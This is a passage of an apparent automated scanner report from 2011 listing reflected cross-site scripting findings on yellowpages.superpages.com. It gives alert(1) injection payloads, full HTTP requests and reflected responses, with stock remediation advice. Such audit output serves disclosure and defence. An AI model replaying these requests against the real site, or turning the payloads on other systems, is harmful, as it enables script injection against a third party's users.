var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://yellowpages.superpages.com
Path: /listings.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56970
Date: Thu, 03 Feb 2011 17:10:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ges.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56887
Date: Thu, 03 Feb 2011 17:10:00 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... om'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://yellowpages.superpages.com
Path: /profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32667
Date: Thu, 03 Feb 2011 17:10:08 GMT
Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64285
Date: Thu, 03 Feb 2011 17:11:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64190
Date: Thu, 03 Feb 2011 17:10:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
